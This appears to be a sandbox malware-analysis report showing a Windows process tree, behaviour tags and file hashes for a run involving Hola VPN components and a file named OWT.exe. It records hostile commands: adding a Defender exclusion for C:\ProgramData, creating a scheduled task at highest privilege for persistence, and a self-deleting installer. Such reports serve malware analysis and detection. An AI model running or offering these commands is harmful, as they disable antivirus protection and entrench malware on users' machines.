C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=6212 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵PID:7164
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --mojo-platform-channel-handle=6100 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
PID:9736
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --mojo-platform-channel-handle=6820 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵PID:9608
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --mojo-platform-channel-handle=6928 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
PID:10124
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --mojo-platform-channel-handle=6960 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
PID:1840
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=proxy_resolver.mojom.ProxyResolverFactory --lang=en-GB --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=5924 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵PID:9412
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=5548 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵PID:8772
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1816 -ip 18161⤵PID:2916
-
C:\ProgramData\winrar\OWT.exeC:\ProgramData\winrar\OWT.exe1⤵
- Checks computer location settings
PID:6952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵PID:6152
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"2⤵PID:3604
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"3⤵
- Creates scheduled task(s)
PID:7736
-
-
-
C:\Windows\system32\sc.exesc query luminati_net_updater_org_hola1⤵
- Launches sc.exe
PID:9148
-
C:\Windows\system32\sc.exesc query luminati_net_updater_win_hola_org_p21⤵
- Launches sc.exe
PID:9080
-
C:\Windows\system32\sc.exesc query luminati_net_updater_win_hola_un_ext_hola_org1⤵PID:9164
-
C:\Windows\system32\sc.exesc query luminati_net_updater_org_hola_browser_updater1⤵
- Launches sc.exe
PID:7340
-
C:\Windows\system32\sc.exesc query luminati_net_updater_win_hola_browser_and_vpn_hola_org1⤵
- Launches sc.exe
PID:9504
-
C:\Windows\system32\sc.exesc query luminati_net_updater_org_hola_vpn1⤵
- Launches sc.exe
PID:9472
-
C:\Windows\system32\sc.exesc query luminati_net_updater_win_hola_off_abtest_hola_org1⤵
- Launches sc.exe
PID:9456
-
C:\Windows\system32\sc.exesc query luminati_net_updater_win_hola_on_abtest_hola_org1⤵
- Launches sc.exe
PID:9432
-
C:\Windows\system32\sc.exesc query luminati_net_updater_win_hola_browser_noconsent_nopeer_hola_org1⤵PID:9408
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵PID:7904
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffedac74f50,0x7ffedac74f60,0x7ffedac74f702⤵PID:5492
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost1⤵PID:8704
-
C:\Users\Admin\Desktop\Setup.exe"C:\Users\Admin\Desktop\Setup.exe"1⤵
- Checks computer location settings
- Checks processor information in registry
PID:6260 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Desktop\Setup.exe" & exit2⤵PID:6056
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:9340
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵PID:4700
-
C:\ProgramData\winrar\OWT.exeC:\ProgramData\winrar\OWT.exe1⤵
- Checks computer location settings
PID:3656
-
C:\Program Files\Softdeluxe\Free Download Manager\helperservice.exe"C:\Program Files\Softdeluxe\Free Download Manager\helperservice.exe"1⤵
- Suspicious use of SetWindowsHookEx
PID:8084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:9296
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5073a3dc0c60492b618f888c5e603fd05
SHA14de52c57f8f032724452e901120bcf0fbee52902
SHA256f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27
SHA5124262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f
-
Filesize
1.4MB
MD5073a3dc0c60492b618f888c5e603fd05
SHA14de52c57f8f032724452e901120bcf0fbee52902
SHA256f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27
SHA5124262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f
-
Filesize
1.4MB
MD5073a3dc0c60492b618f888c5e603fd05
SHA14de52c57f8f032724452e901120bcf0fbee52902
SHA256f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27
SHA5124262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f
-
Filesize
40B
MD560cd6e50a74c45f9514c2ec70fe16a0d
SHA14d09cb4351688681c28912f89869703fc3a98c0a
SHA25632fc80412bdafb44620e9694a7a9e1328c6067977021068d93061ee7753522d1
SHA512cbab6f727cfedfeddd32fb9763479530530b79df262d09f319fecac9f89d9e08a5f38331f85f26930a35bf6e5bac01821b8edea4bd2b3abec5db55ff4468857e
-
Filesize
40B
MD560cd6e50a74c45f9514c2ec70fe16a0d
SHA14d09cb4351688681c28912f89869703fc3a98c0a
SHA25632fc80412bdafb44620e9694a7a9e1328c6067977021068d93061ee7753522d1
SHA512cbab6f727cfedfeddd32fb9763479530530b79df262d09f319fecac9f89d9e08a5f38331f85f26930a35bf6e5bac01821b8edea4bd2b3abec5db55ff4468857e
-
Filesize
88KB
MD58791f640953d16706799f0e174c0b178
SHA1a402ed34838a52c3ea67b3303a62d400c9f1900d
SHA256ddceb17df76f48b14de37aa7410622ed5020135dc6ed4c1c1aba3f6ad99f3a8a
SHA512a50cbd65c84b64d958a0990e9e63c759db76be27b18855309099e1f8b7b91a88e643f28ad1a1b54a3c613320aaf855d55849ef13466f5bc1d6c70fc785333d3d
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
138B
MD5cd8f7d9127705c7a9d11ddc1e917459c
SHA19c8787273320932cd174a49c67be7c088721cb6b
SHA256cd93743b49ab5ba05c6b0d205e69eead65b0f0ac38db960f4cd3b8790a99911f
SHA512313286346f3d9b5b98b5b662b0dc5bf43bad958218444f308ddae2d98c5051ba73b5056d4abc6f817117f307e698519ab8ae7e13b614b781f29b2e3ab7740786